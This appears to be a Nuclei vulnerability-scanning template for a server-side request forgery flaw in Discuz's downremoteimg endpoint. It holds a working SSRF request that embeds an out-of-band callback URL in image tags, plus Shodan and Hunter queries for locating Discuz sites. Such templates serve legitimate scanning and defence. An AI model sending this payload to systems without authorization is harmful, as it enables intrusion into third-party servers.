37 lines
957 B
YAML
37 lines
957 B
YAML
id: discuz-downremoteimg-ssrf
|
|
|
|
info:
|
|
name: Discuz DownRemoteImg - Server-Side Request Forgery
|
|
author: pwnhxl
|
|
severity: high
|
|
description: Discuz DownRemoteImg - Server-Side Request Forgery
|
|
reference:
|
|
- https://www.seebug.org/vuldb/ssvid-91879
|
|
- https://cloud.tencent.com/developer/article/1511949
|
|
- https://github.com/opensec-cn/kunpeng/blob/master/plugin/go/discuzSSRF.go
|
|
metadata:
|
|
verified: "true"
|
|
shodan-query: title:"Powered by Discuz"
|
|
hunter-query: web.body="Discuz! X3.1"
|
|
tags: discuz,ssrf,oast
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/forum.php?mod=ajax&action=downremoteimg&message=[img]http://{{interactsh-url}}/test?.jpg[/img]"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "ATTACHORIMAGE"
|
|
|
|
- type: status
|
|
status:
|
|
- 200 |